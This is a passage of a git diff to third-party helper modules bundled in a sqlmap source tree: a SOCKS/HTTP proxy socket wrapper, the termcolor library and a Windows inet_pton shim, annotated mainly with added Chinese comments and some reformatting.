-        self.sendall(req)
-        # Get the response from the server
+            req = req + destaddr + chr(0x00).encode()  # SOCKS4A扩展
+        self.sendall(req)  # 发送请求
+
+        # 获取服务器响应
         resp = self.__recvall(8)
         if resp[0:1] != chr(0x00).encode():
-            # Bad data
+            # 出现错误
             self.close()
-            raise GeneralProxyError((1,_generalerrors[1]))
+            raise GeneralProxyError((1, _generalerrors[1]))  # 无效数据
         if resp[1:2] != chr(0x5A).encode():
-            # Server returned an error
+            # 服务器返回错误
             self.close()
             if ord(resp[1:2]) in (91, 92, 93):
                 self.close()
-                raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
+                raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))  # 处理错误代码
             else:
-                raise Socks4Error((94, _socks4errors[4]))
-        # Get the bound address/port
-        self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
+                raise Socks4Error((94, _socks4errors[4]))  # 一般性错误
+
+        # 获取绑定的地址和端口
+        self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])  # 保存绑定信息
         if rmtrslv != None:
-            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
+            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)  # 目标地址
         else:
-            self.__proxypeername = (destaddr, destport)
+            self.__proxypeername = (destaddr, destport)  # 目标地址
 
     def __negotiatehttp(self, destaddr, destport):
         """__negotiatehttp(self,destaddr,destport)
         Negotiates a connection through an HTTP server.
         """
-        # If we need to resolve locally, we do this now
+        # 本地解析
         if not self.__proxy[3]:
             addr = socket.gethostbyname(destaddr)
         else:
             addr = destaddr
-        self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
-        # We read the response until we get the string "\r\n\r\n"
+
+        # 发送HTTP的CONNECT请求
+        self.sendall(
+            ("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
+
+        # 读取响应直到遇到"\r\n\r\n"
         resp = self.recv(1)
         while resp.find("\r\n\r\n".encode()) == -1:
             resp = resp + self.recv(1)
-        # We just need the first line to check if the connection
-        # was successful
+
+        # 仅需第一行检查连接是否成功
         statusline = resp.splitlines()[0].split(" ".encode(), 2)
         if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
             self.close()
-            raise GeneralProxyError((1, _generalerrors[1]))
+            raise GeneralProxyError((1, _generalerrors[1]))  # 无效的HTTP协议
         try:
-            statuscode = int(statusline[1])
+            statuscode = int(statusline[1])  # 获取状态码
         except ValueError:
             self.close()
-            raise GeneralProxyError((1, _generalerrors[1]))
+            raise GeneralProxyError((1, _generalerrors[1]))  # 状态码无效
         if statuscode != 200:
             self.close()
-            raise HTTPError((statuscode, statusline[2]))
-        self.__proxysockname = ("0.0.0.0", 0)
-        self.__proxypeername = (addr, destport)
+            raise HTTPError((statuscode, statusline[2]))  # 显示状态码错误
+
+        # 连接成功后的代理信息
+        self.__proxysockname = ("0.0.0.0", 0)  # 绑定在0.0.0.0
+        self.__proxypeername = (addr, destport)  # 保存peer信息
 
     def connect(self, destpair):
-        """connect(self, despair)
+        """connect(self, destpair)
         Connects to the specified destination through a proxy.
-        destpar - A tuple of the IP/DNS address and the port number.
+        destpair - A tuple of the IP/DNS address and the port number.
         (identical to socket's connect).
         To select the proxy server use setproxy().
         """
-        # Do a minimal input check first
-        if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):
+        # 校验输入参数
+        if (not type(destpair) in (list, tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (
+                type(destpair[1]) != int):
             raise GeneralProxyError((5, _generalerrors[5]))
+
+        # 根据代理类型选择相应的握手协议
         if self.__proxy[0] == PROXY_TYPE_SOCKS5:
             if self.__proxy[2] != None:
                 portnum = self.__proxy[2]
             else:
-                portnum = 1080
-            _orgsocket.connect(self, (self.__proxy[1], portnum))
-            self.__negotiatesocks5(destpair[0], destpair[1])
+                portnum = 1080  # 默认端口
+
+            _orgsocket.connect(self, (self.__proxy[1], portnum))  # 连接到代理
+            self.__negotiatesocks5(destpair[0], destpair[1])  # 握手
+
         elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
             if self.__proxy[2] != None:
                 portnum = self.__proxy[2]
             else:
-                portnum = 1080
-            _orgsocket.connect(self,(self.__proxy[1], portnum))
-            self.__negotiatesocks4(destpair[0], destpair[1])
+                portnum = 1080  # 默认端口
+
+            _orgsocket.connect(self, (self.__proxy[1], portnum))  # 连接到代理
+            self.__negotiatesocks4(destpair[0], destpair[1])  # 握手
+
         elif self.__proxy[0] == PROXY_TYPE_HTTP:
             if self.__proxy[2] != None:
                 portnum = self.__proxy[2]
             else:
-                portnum = 8080
-            _orgsocket.connect(self,(self.__proxy[1], portnum))
-            self.__negotiatehttp(destpair[0], destpair[1])
+                portnum = 8080  # 默认端口
+
+            _orgsocket.connect(self, (self.__proxy[1], portnum))  # 连接到代理
+            self.__negotiatehttp(destpair[0], destpair[1])  # 握手
+
         elif self.__proxy[0] == None:
+            # 没有代理时直接连接目标
             _orgsocket.connect(self, (destpair[0], destpair[1]))
         else:
-            raise GeneralProxyError((4, _generalerrors[4]))
+            raise GeneralProxyError((4, _generalerrors[4]))  # 不支持的代理类型
 
 def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
                     source_address=None):
diff --git a/src/sqlmap-master/thirdparty/termcolor/termcolor.py b/src/sqlmap-master/thirdparty/termcolor/termcolor.py
index ddea6dd..2ba380b 100644
--- a/src/sqlmap-master/thirdparty/termcolor/termcolor.py
+++ b/src/sqlmap-master/thirdparty/termcolor/termcolor.py
@@ -79,12 +79,14 @@ COLORS = dict(
             ))
         )
 
+# 添加亮色到 COLORS 字典
 COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS))
 
-# Reference: https://misc.flogisoft.com/bash/tip_colors_and_formatting
-COLORS["lightgrey"] = 37
-COLORS["darkgrey"] = 90
+# 带有参考的颜色定义
+COLORS["lightgrey"] = 37  # 亮灰色
+COLORS["darkgrey"] = 90   # 深灰色
 
+# 定义重置颜色的转义序列
 RESET = '\033[0m'
 
 
@@ -104,34 +106,37 @@ def colored(text, color=None, on_color=None, attrs=None):
         colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])
         colored('Hello, World!', 'green')
     """
+    # 检查环境变量，以决定是否支持 ANSI 颜色
     if os.getenv('ANSI_COLORS_DISABLED') is None:
-        fmt_str = '\033[%dm%s'
+        fmt_str = '\033[%dm%s'  # ANSI 格式化字符串
         if color is not None:
-            text = fmt_str % (COLORS[color], text)
+            text = fmt_str % (COLORS[color], text)  # 将文本颜色应用于文本
 
         if on_color is not None:
-            text = fmt_str % (HIGHLIGHTS[on_color], text)
+            text = fmt_str % (HIGHLIGHTS[on_color], text)  # 将背景颜色应用于文本
 
         if attrs is not None:
             for attr in attrs:
-                text = fmt_str % (ATTRIBUTES[attr], text)
+                text = fmt_str % (ATTRIBUTES[attr], text)  # 应用文本属性
 
-        text += RESET
+        text += RESET  # 重置颜色到默认值
     return text
 
 
 def cprint(text, color=None, on_color=None, attrs=None, **kwargs):
-    """Print colorize text.
+    """打印带颜色的文本。
 
-    It accepts arguments of print function.
+    支持 print 函数的所有参数。
     """
-
-    print((colored(text, color, on_color, attrs)), **kwargs)
+    print((colored(text, color, on_color, attrs)), **kwargs)  # 调用 colored 函数并进行打印
 
 
 if __name__ == '__main__':
-    print('Current terminal type: %s' % os.getenv('TERM'))
+    # 用于测试的主模块
+    print('Current terminal type: %s' % os.getenv('TERM'))  # 打印当前终端类型
     print('Test basic colors:')
+
+    # 测试基本颜色
     cprint('Grey color', 'grey')
     cprint('Red color', 'red')
     cprint('Green color', 'green')
@@ -143,6 +148,7 @@ if __name__ == '__main__':
     print(('-' * 78))
 
     print('Test highlights:')
+    # 测试背景高亮
     cprint('On grey color', on_color='on_grey')
     cprint('On red color', on_color='on_red')
     cprint('On green color', on_color='on_green')
@@ -154,6 +160,7 @@ if __name__ == '__main__':
     print('-' * 78)
 
     print('Test attributes:')
+    # 测试文本属性
     cprint('Bold grey color', 'grey', attrs=['bold'])
     cprint('Dark red color', 'red', attrs=['dark'])
     cprint('Underline green color', 'green', attrs=['underline'])
@@ -161,13 +168,12 @@ if __name__ == '__main__':
     cprint('Reversed blue color', 'blue', attrs=['reverse'])
     cprint('Concealed Magenta color', 'magenta', attrs=['concealed'])
     cprint('Bold underline reverse cyan color', 'cyan',
-            attrs=['bold', 'underline', 'reverse'])
+           attrs=['bold', 'underline', 'reverse'])
     cprint('Dark blink concealed white color', 'white',
-            attrs=['dark', 'blink', 'concealed'])
+           attrs=['dark', 'blink', 'concealed'])
     print(('-' * 78))
 
     print('Test mixing:')
-    cprint('Underline red on grey color', 'red', 'on_grey',
-            ['underline'])
-    cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])
-
+    # 测试混合使用颜色和属性
+    cprint('Underline red on grey color', 'red', 'on_grey', ['underline'])
+    cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])
\ No newline at end of file
diff --git a/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py b/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py
index 50ae621..cfe5b3b 100644
--- a/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py
+++ b/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py
@@ -9,30 +9,51 @@ import ctypes
 import os
 
 
+# 定义 sockaddr 结构体，以便与底层 socket API 交互
 class sockaddr(ctypes.Structure):
-    _fields_ = [("sa_family", ctypes.c_short),
-                ("__pad1", ctypes.c_ushort),
-                ("ipv4_addr", ctypes.c_byte * 4),
-                ("ipv6_addr", ctypes.c_byte * 16),
-                ("__pad2", ctypes.c_ulong)]
+    _fields_ = [
+        ("sa_family", ctypes.c_short),  # 地址族，例如 AF_INET 或 AF_INET6
+        ("__pad1", ctypes.c_ushort),  # 填充字段用于对齐
+        ("ipv4_addr", ctypes.c_byte * 4),  # IPv4 地址（4 字节）
+        ("ipv6_addr", ctypes.c_byte * 16),  # IPv6 地址（16 字节）
+        ("__pad2", ctypes.c_ulong)  # 额外填充字段
+    ]
 
+
+# 检测是否在 Windows 平台上，并加载相应的 Windows socket 函数
 if hasattr(ctypes, 'windll'):
-    WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA
-    WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA
+    WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA  # 字符串转换为地址
+    WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA  # 地址转换为字符串
 else:
     def not_windows():
         raise SystemError(
             "Invalid platform. ctypes.windll must be available."
         )
-    WSAStringToAddressA = not_windows
-    WSAAddressToStringA = not_windows
+
+
+    WSAStringToAddressA = not_windows  # 非 Windows 平台时的占位符
+    WSAAddressToStringA = not_windows  # 非 Windows 平台时的占位符
 
 
 def inet_pton(address_family, ip_string):
-    addr = sockaddr()
-    addr.sa_family = address_family
-    addr_size = ctypes.c_int(ctypes.sizeof(addr))
+    """
+    Convert an IP address from text to binary format.
+
+    Args:
+        address_family: The address family (AF_INET for IPv4 or AF_INET6 for IPv6).
+        ip_string: The IP address in string form (e.g., "192.168.1.1").
+
+    Returns:
+        A packed binary representation of the IP address.
 
+    Raises:
+        socket.error: If the conversion fails.
+    """
+    addr = sockaddr()  # 创建 sockaddr 实例
+    addr.sa_family = address_family  # 设置地址族
+    addr_size = ctypes.c_int(ctypes.sizeof(addr))  # 地址结构的大小
+
+    # 调用 WSAStringToAddressA 将字符串 IP 转换为二进制地址
     if WSAStringToAddressA(
             ip_string,
             address_family,
@@ -40,34 +61,50 @@ def inet_pton(address_family, ip_string):
             ctypes.byref(addr),
             ctypes.byref(addr_size)
     ) != 0:
-        raise socket.error(ctypes.FormatError())
+        raise socket.error(ctypes.FormatError())  # 转换失败时抛出异常
 
+    # 根据地址族返回相应的打包 IP 地址
     if address_family == socket.AF_INET:
-        return ctypes.string_at(addr.ipv4_addr, 4)
+        return ctypes.string_at(addr.ipv4_addr, 4)  # IPv4 地址
     if address_family == socket.AF_INET6:
-        return ctypes.string_at(addr.ipv6_addr, 16)
+        return ctypes.string_at(addr.ipv6_addr, 16)  # IPv6 地址
 
-    raise socket.error('unknown address family')
+    raise socket.error('unknown address family')  # 抛出未知地址族的异常
 
 
 def inet_ntop(address_family, packed_ip):
-    addr = sockaddr()
-    addr.sa_family = address_family
-    addr_size = ctypes.c_int(ctypes.sizeof(addr))
-    ip_string = ctypes.create_string_buffer(128)
-    ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))
+    """
+    Convert a binary IP address to its text representation.
+
+    Args:
+        address_family: The address family (AF_INET for IPv4 or AF_INET6 for IPv6).
+        packed_ip: The packed binary IP address.
+
+    Returns:
+        The IP address in string form.
 
+    Raises:
+        socket.error: If the conversion fails.
+    """
+    addr = sockaddr()  # 创建 sockaddr 实例
+    addr.sa_family = address_family  # 设置地址族
+    addr_size = ctypes.c_int(ctypes.sizeof(addr))  # 地址结构的大小
+    ip_string = ctypes.create_string_buffer(128)  # 用于存储 IP 字符串
+    ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))  # 字符串大小
+
+    # 根据地址族填充 sockaddr 结构
     if address_family == socket.AF_INET:
         if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr):
-            raise socket.error('packed IP wrong length for inet_ntoa')
-        ctypes.memmove(addr.ipv4_addr, packed_ip, 4)
+            raise socket.error('packed IP wrong length for inet_ntoa')  # IPv4 地址长度错误
+        ctypes.memmove(addr.ipv4_addr, packed_ip, 4)  # 复制 IPv4 地址
     elif address_family == socket.AF_INET6:
         if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr):
-            raise socket.error('packed IP wrong length for inet_ntoa')
-        ctypes.memmove(addr.ipv6_addr, packed_ip, 16)
+            raise socket.error('packed IP wrong length for inet_ntoa')  # IPv6 地址长度错误
+        ctypes.memmove(addr.ipv6_addr, packed_ip, 16)  # 复制 IPv6 地址
     else:
-        raise socket.error('unknown address family')
+        raise socket.error('unknown address family')  # 抛出未知地址族的异常
 
+    # 调用 WSAAddressToStringA 将二进制地址转换为字符串
     if WSAAddressToStringA(
             ctypes.byref(addr),
             addr_size,
@@ -75,11 +112,12 @@ def inet_ntop(address_family, packed_ip):
             ip_string,
             ctypes.byref(ip_string_size)
     ) != 0:
-        raise socket.error(ctypes.FormatError())
+        raise socket.error(ctypes.FormatError())  # 转换失败时抛出异常
+
+    return ip_string[:ip_string_size.value - 1]  # 返回字符串表示形式，移除尾部的空字符
 
-    return ip_string[:ip_string_size.value - 1]
 
-# Adding our two functions to the socket library
+# 如果在 Windows 平台，将自定义的函数添加到 socket 库中
 if os.name == 'nt':
-    socket.inet_pton = inet_pton
-    socket.inet_ntop = inet_ntop
+    socket.inet_pton = inet_pton  # 添加 inet_pton 函数
+    socket.inet_ntop = inet_ntop  # 添加 inet_ntop 函数
\ No newline at end of file